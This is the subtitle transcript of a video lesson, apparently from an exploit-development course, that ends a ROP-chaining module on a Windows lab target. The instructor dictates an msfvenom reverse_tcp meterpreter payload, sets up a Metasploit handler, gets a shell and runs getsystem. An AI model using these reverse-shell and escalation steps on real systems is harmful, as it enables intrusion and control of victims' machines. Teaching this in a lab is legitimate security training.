1 00:00:00,060 --> 00:00:00,720 Hello again.
2 00:00:00,720 --> 00:00:08,730 Welcome back to ROP chaining, and we finally get that non-executable bit shut down.
3 00:00:08,940 --> 00:00:17,220 We disabled DEP in our previous section. As you can see right here, we passed through all the NOPs
4 00:00:17,220 --> 00:00:19,560 for executing, and we called VirtualProtect.
5 00:00:20,340 --> 00:00:25,020 So what we're going to do now is generate our shellcode to generate our shell.
6 00:00:25,710 --> 00:00:32,729 So we want to use the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my attacking machine>
7 00:00:32,729 --> 00:00:40,470 LPORT=4444, eliminate just the null byte, EXITFUNC=thread, -f python.
8 00:00:58,960 --> 00:01:00,700 So let's copy all of this.
9 00:01:06,530 --> 00:01:06,790 Now.
10 00:01:06,800 --> 00:01:07,610 nano new.
11 00:01:08,300 --> 00:01:10,220 Well, actually, let's give it the variable.
12 00:01:10,550 --> 00:01:11,070 shellcode.
13 00:01:11,390 --> 00:01:11,860 Sorry.
14 00:01:12,800 --> 00:01:14,030 Let's just regenerate this again.
15 00:01:25,490 --> 00:01:27,140 So just copy the shellcode.
16 00:01:27,860 --> 00:01:29,030 nano new
17 00:01:31,550 --> 00:01:38,720 Insert the shellcode right here, and then we're going to modify our payload again.
18 00:01:39,650 --> 00:01:42,110 So let's just go back to my previous notes.
19 00:01:47,830 --> 00:01:49,450 And we're going to change...
20 00:01:50,460 --> 00:01:51,040 Let's see.
21 00:01:52,880 --> 00:02:02,660 I'm going to change the padding string: from this, subtract one, which is the break right here, replaced
22 00:02:02,700 --> 00:02:03,660 after the shellcode.
23 00:02:03,900 --> 00:02:12,570 So it's the length of our shellcode minus one, on one line of shellcode, and for the break,
24 00:02:13,290 --> 00:02:14,850 we're going to enter the shellcode right here.
25 00:02:20,990 --> 00:02:23,180 I hope I'm not going too fast for everybody.
26 00:02:26,870 --> 00:02:33,680 If I am going too fast, please review the videos, or just add a question on Udemy in the discussion.
27 00:02:35,840 --> 00:02:37,580 And now let's start
28 00:02:39,200 --> 00:02:40,190 msfconsole.
29 00:02:57,270 --> 00:02:59,220 use multi/handler.
30 00:03:03,000 --> 00:03:07,970 set payload windows/meterpreter/reverse_tcp.
31 00:03:10,820 --> 00:03:18,610 set LHOST 0.0.0.0, and show missing.
32 00:03:21,790 --> 00:03:26,020 run -j, and let's restart
33 00:03:26,410 --> 00:03:27,550 Immunity Debugger again.
34 00:03:27,760 --> 00:03:29,770 So click on Debug, Restart.
35 00:03:30,520 --> 00:03:31,090 Yes.
36 00:03:32,720 --> 00:03:33,440 Press play.
37 00:03:37,930 --> 00:03:38,680 And python:
38 00:03:39,700 --> 00:03:41,670 python new.py.
39 00:03:43,420 --> 00:03:44,430 Press play again.
40 00:03:48,060 --> 00:03:50,670 And we created a meterpreter session.
41 00:03:53,940 --> 00:03:54,900 Keep pressing play.
42 00:03:56,940 --> 00:03:59,070 And execution will drive us to the shell.
43 00:04:03,640 --> 00:04:06,250 Sessions, such as this one.
44 00:04:06,850 --> 00:04:07,240 How?
45 00:04:10,230 --> 00:04:13,560 Let's see if we can run a command: system.
46 00:04:17,230 --> 00:04:17,890 Cashed up.
47 00:04:20,769 --> 00:04:21,370 Excellent.
48 00:04:21,700 --> 00:04:23,590 So we just covered ROP chaining.
49 00:04:24,370 --> 00:04:27,220 This is a very, very simplified version of ROP chaining.
50 00:04:27,520 --> 00:04:33,430 I actually prefer that you guys understand the intricate details of how ROP chaining works, and there
51 00:04:33,430 --> 00:04:36,250 are plenty of resources that I will show you later.
52 00:04:37,150 --> 00:04:45,790 Links on how ROP chaining actually works, because this is basically easy-mode ROP chaining: disabling
53 00:04:45,790 --> 00:04:55,060 DEP by using Mona's rop module. And before Mona, before msfrop, which is another Metasploit tool
54 00:04:55,060 --> 00:05:02,650 that was used to create ROP chains, we had to manually craft our ROP chains, and it was basically
55 00:05:02,650 --> 00:05:09,760 like finding... it was like navigating one of those paper mazes that we had when we were in elementary
56 00:05:09,760 --> 00:05:10,630 school, with a pencil.
57 00:05:11,140 --> 00:05:21,580 We had to call specific gadgets in a way that would take us and align our stack pointer to where
58 00:05:21,580 --> 00:05:24,580 we want to call VirtualProtect to shut down DEP.
59 00:05:25,210 --> 00:05:27,370 So thank you for your time.
60 00:05:27,820 --> 00:05:32,020 This is the end of the ROP chaining module, and please see the additional resources I will be adding
61 00:05:32,020 --> 00:05:32,860 on ROP chaining.